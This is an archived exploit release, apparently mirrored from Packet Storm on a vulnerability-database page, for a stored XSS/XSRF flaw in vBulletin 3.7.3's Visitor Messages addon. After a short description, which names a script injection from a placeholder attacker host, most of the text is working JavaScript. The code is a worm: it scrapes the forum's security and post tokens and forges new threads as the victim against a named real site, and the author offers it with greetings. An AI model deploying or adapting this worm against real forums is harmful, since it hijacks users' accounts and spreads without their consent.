Lucene search

vbulletin-xssxsrf.txt

🗓️ 20 Nov 2008 00:00:00Reported by MxType

packetstorm🔗 packetstormsecurity.com👁 17 Views

vBulletin 3.7.3 Visitor Messages XSS/XSRF vulnerability

5 of 5AI Insights are available for you today

Leverage the power of AI to quickly understand vulnerabilities, impacts, and exploitability

`/* -----------------------------  
* Author = Mx  
* Title = vBulletin 3.7.3 Visitor Messages XSS/XSRF + worm  
* Software = vBulletin  
* Addon = Visitor Messages  
* Version = 3.7.3  
* Attack = XSS/XSRF  
  
- Description = A critical vulnerability exists in the new vBulletin 3.7.3 software which comes included  
+ with the visitor messages addon (a clone of a social network wall/comment area).  
- When posting XSS, the data is run through htmlentities(); before being displayed  
+ to the general public/forum members. However, when posting a new message,  
- a new notification is sent to the commentee. The commenter posts a XSS vector such as  
+ <script src="http://evilsite.com/nbd.js">, and when the commentee visits usercp.php  
- under the domain, they are hit with an unfiltered xss attach. XSRF is also readily available  
+ and I have included an example worm that makes the user post a new thread with your own  
- specified subject and message.  
  
* Enjoy. Greets to Zain, Ytcracker, and http://digitalgangster.com which was the first subject  
* of the attack method.  
* ----------------------------- */  
  
function getNewHttpObject() {  
var objType = false;  
try {  
objType = new ActiveXObject('Msxml2.XMLHTTP');  
} catch(e) {  
try {  
objType = new ActiveXObject('Microsoft.XMLHTTP');  
} catch(e) {  
objType = new XMLHttpRequest();  
}  
}  
return objType;  
}  
  
function getAXAH(url){  
  
var theHttpRequest = getNewHttpObject();  
theHttpRequest.onreadystatechange = function() {processAXAH();};  
theHttpRequest.open("GET", url);  
theHttpRequest.send(false);  
  
function processAXAH(){  
if (theHttpRequest.readyState == 4) {  
if (theHttpRequest.status == 200) {  
  
var str = theHttpRequest.responseText;  
var secloc = str.indexOf('var SECURITYTOKEN = "');  
var sectok = str.substring(21+secloc,secloc+51+21);  
  
var posloc = str.indexOf('posthash" value="');  
var postok = str.substring(17+posloc,posloc+32+17);  
  
var subject = 'subject text';  
var message = 'message text';  
  
postAXAH('http://digitalgangster.com/4um/newthread.php?do=postthread&f=5', 'subject=' + subject + '&message=' + message + '&wysiwyg=0&taglist=&iconid=0&s=&securitytoken=' + sectok + '&f=5&do=postthread&posthash=' + postok + 'poststarttime=1&loggedinuser=1&sbutton=Submit+New+Thread&signature=1&parseurl=1&emailupdate=0&polloptions=4');  
  
}  
}  
}  
}  
  
  
  
  
  
  
  
  
function postAXAH(url, params) {  
var theHttpRequest = getNewHttpObject();  
  
theHttpRequest.onreadystatechange = function() {processAXAHr(elementContainer);};  
theHttpRequest.open("POST", url);  
theHttpRequest.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded; charset=iso-8859-2');  
theHttpRequest.send(params);  
  
function processAXAHr(elementContainer){  
if (theHttpRequest.readyState == 4) {  
if (theHttpRequest.status == 200) {  
  
}  
}  
}  
}  
  
  
getAXAH('http://digitalgangster.com/4um/newthread.php?do=newthread&f=5');  
document.write('<iframe src="http://digitalgangster.com/4um/newthread.php?do=newthread&f=5">');  
  
`

Transform Your Security Services

Elevate your offerings with Vulners' advanced Vulnerability Intelligence. Contact us for a demo and discover the difference comprehensive, actionable intelligence can make in your security strategy.

Book a live demo

20 Nov 2008 00:00Current

7.4High risk

Vulners AI Score7.4